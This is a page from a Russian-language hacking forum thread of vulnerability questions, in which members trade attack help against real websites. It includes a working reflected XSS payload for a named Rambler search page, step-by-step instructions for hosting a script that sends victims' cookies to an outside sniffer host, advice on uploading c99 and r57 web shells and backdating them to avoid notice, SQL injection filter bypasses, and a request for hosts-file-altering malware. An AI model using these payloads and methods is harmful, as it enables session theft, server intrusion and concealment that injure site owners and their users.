Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. Jazz

    Jazz Elder - Старейшина

    Регистрация:
    27.09.2008
    Сообщения:
    80
    Одобрения:
    2
    Репутация:
    -1
    есть у когонибудь файлы вируса который правит этот файл -"C:\WINDOWS\system32\drivers\etc\hosts" если не трудно скинте ссылку где скачать можно...или как самому написать такой... вобщем интересует всё по этой теме...буду рад любой помощи...
     
  2. Cehennem

    Cehennem Banned

    Регистрация:
    3.06.2009
    Сообщения:
    28
    Одобрения:
    1
    Репутация:
    0
    PHP:
    http://m.myrambler.ru/search.php?pagelen=10&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Вот это работает.

    А когда ставлю ссылку из сниффера, тогда не работает.

    mailbrush прав, если значение поисков нету тогда и xss нету, дело в том что в значениях поиска нет ссылки из сниффера, а раза "><script>alert('xss')</script> есть, поэтому xss как "><script>alert('xss')</script> действует, а ссылка из сниффера не действует,
     
  3. mailbrush

    mailbrush Well-Known Member

    Регистрация:
    24.06.2008
    Сообщения:
    1 997
    Одобрения:
    996
    Репутация:
    155
    Если я напишу Google, выдача поиска будет, но XSS нет. А если же
    Code:
    google "><script>img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;</script> 
    не будет выдачи, т.к. поиск ничего не найдет. И опять советуешь не проверяя... Оператора OR нету в рамблере, и при чем здесь яша? В коде + нужен как плюс, а не пробел! Ты конкатезируешь
    Code:
    http://httpz.ru/ndemo.gif?
    и куки.

    Cehennem, зарегай себе хост, к примеру sdagsfhfh.ru, залей файлик script.js по адресу
    Code:
    http://sdagsfhfh.ru/script.js
    с содержанием
    Code:
    img = new Image(); 
    img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;
    Дальше заходи
    Code:
    http://m.myrambler.ru/search.php?pagelen=10&query="><script src="http://sdagsfhfh.ru/script.js"></script>
    Потом на сниффер :) И ты увидишь стыренные куки...
     
    Это одобряют 2 пользоветелей.
  4. EoGeneo

    EoGeneo Member

    Регистрация:
    29.08.2009
    Сообщения:
    127
    Одобрения:
    9
    Репутация:
    1
    У меня вопросик. есть сайтик...открыт 88 порт. там открыты две дерриктория одна админка...во второй фаил httacces - читаемый. можно туда шшел впарить. За ссылкой сайта пишите в личку.
     
  5. mailbrush

    mailbrush Well-Known Member

    Регистрация:
    24.06.2008
    Сообщения:
    1 997
    Одобрения:
    996
    Репутация:
    155
    Это обычный листинг.
    Ничего не сделаешь.
     
  6. EoGeneo

    EoGeneo Member

    Регистрация:
    29.08.2009
    Сообщения:
    127
    Одобрения:
    9
    Репутация:
    1
    Понятно =) спасибо успокоил )
     
  7. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Регистрация:
    25.04.2007
    Сообщения:
    142
    Одобрения:
    246
    Репутация:
    73
    Code:
    *6AA4CFC00B1D328F27C6DEF46C4E3CBD30925B97
     
    Это одобряют 3 пользоветелей.
  8. L I G A

    L I G A Banned

    Регистрация:
    27.07.2008
    Сообщения:
    482
    Одобрения:
    380
    Репутация:
    49
    за какие приделы? откуда выйти? разъясняй понятней.
     
  9. j0ker13

    j0ker13 Elder - Старейшина

    Регистрация:
    28.07.2008
    Сообщения:
    199
    Одобрения:
    16
    Репутация:
    5
    он видимо имеет ввиду хедеры) да?)
     
  10. Shadrin

    Shadrin Elder - Старейшина

    Регистрация:
    20.08.2008
    Сообщения:
    263
    Одобрения:
    109
    Репутация:
    18
    вопрос такой,как выставить дату заливки шелла?
     
  11. S00pY

    S00pY Active Member

    Регистрация:
    24.04.2007
    Сообщения:
    91
    Одобрения:
    109
    Репутация:
    21
    http://ru.php.net/touch
     
    Это одобряет 1 пользователь.
  12. Zitt

    Zitt Elder - Старейшина

    Регистрация:
    7.05.2006
    Сообщения:
    736
    Одобрения:
    268
    Репутация:
    59
    del
     
    #8752 Zitt, 6.09.2009
    В последний раз редактировалось: 9.09.2009
  13. Shadrin

    Shadrin Elder - Старейшина

    Регистрация:
    20.08.2008
    Сообщения:
    263
    Одобрения:
    109
    Репутация:
    18
    такая беда,залил шелл, сервер : 2003 + wampserver,но файлы шелл (с99) заливать не хочет выбивает и все,на линусах некторых тоже такая фигня поскакивает, не буду же каждый раз я через админку все грузить,какие причины этого? спасибо!
     
  14. $n@ke

    $n@ke Elder - Старейшина

    Регистрация:
    18.09.2006
    Сообщения:
    696
    Одобрения:
    404
    Репутация:
    134
    причины:
    1 - Не с99 единым...
    2 - Есть еще "создать файл"
    3 - права на запись есть?
     
  15. nemaniak

    nemaniak Elder - Старейшина

    Регистрация:
    10.06.2008
    Сообщения:
    195
    Одобрения:
    161
    Репутация:
    108
    Можно ли как-то использовать LIKE в инъекции, если кавычки экранируются? БД MySQL.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Регистрация:
    18.02.2008
    Сообщения:
    1 038
    Одобрения:
    1 139
    Репутация:
    350
    LIKE+CHAR(37,112,37)
    LIKE+0x257025
     
    Это одобряет 1 пользователь.
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Администрация

    Регистрация:
    15.03.2009
    Сообщения:
    946
    Одобрения:
    838
    Репутация:
    605
    просто может быть причина в том что он закодирован и как то этим фильтруется, поэтому в инете есть куча шеллов не кодированых, пробуй их
     
    _________________________
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Регистрация:
    18.02.2008
    Сообщения:
    1 038
    Одобрения:
    1 139
    Репутация:
    350
    Ээээ ?

    "закодирован и как то этим фильтруется" -- что это должно означать?

    Чем "этим" и кто "он" фильтруется, и как по причине "закодирования" может не работать заливка файлов?
     
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Администрация

    Регистрация:
    15.03.2009
    Сообщения:
    946
    Одобрения:
    838
    Репутация:
    605
    я не знаю ,но на один серв когда я лил ,с99, то он у меня не лился, сам не понимал что да как , а когда залил не закодированный шелл то он залился
     
    _________________________
  20. Shadrin

    Shadrin Elder - Старейшина

    Регистрация:
    20.08.2008
    Сообщения:
    263
    Одобрения:
    109
    Репутация:
    18
    На винде есть прова на чтение запись практиски куда угодно,а вод под никсом одним и r57 не аплоадит,там сборка 1 апреля этого года,вообще не знаю чего думать,перепробовал все папки где есть прова (копи-пастил его) и пофик :confused:
    p.s создать файл не катит,их надо больше штуки содавать
    это бывает когда ты льешь с подменой расширения
     
    #8760 Shadrin, 6.09.2009
    В последний раз редактировалось: 6.09.2009
Статус темы:
Тема закрыта для ответов.